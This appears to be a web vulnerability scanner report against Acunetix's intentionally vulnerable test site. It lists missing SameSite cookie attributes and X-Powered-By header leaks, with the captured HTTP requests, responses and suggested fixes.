Cookie without SameSite Attribute (2)
GET http://testaspnet.vulnweb.com
Alert tags Alert description Cookie已被设置为无SameSite属性,这意味着Cookie可以作为“跨站点”请求的结果来发送。SameSite属性是一个用以测量跨站点请求伪造数量、包含跨站点脚本数量和定时攻击数量的高效计数器。
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:16 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter ASP.NET_SessionIdEvidence Set-Cookie: ASP.NET_SessionIdSolution Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
GET http://testaspnet.vulnweb.com/
Alert tags Alert description Cookie已被设置为无SameSite属性,这意味着Cookie可以作为“跨站点”请求的结果来发送。SameSite属性是一个用以测量跨站点请求伪造数量、包含跨站点脚本数量和定时攻击数量的高效计数器。
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:15 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter ASP.NET_SessionIdEvidence Set-Cookie: ASP.NET_SessionIdSolution Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
-
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) (38)
GET http://testaspnet.vulnweb.com
Alert tags Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:16 GMT Content-Length: 13912Response body (13912 bytes)
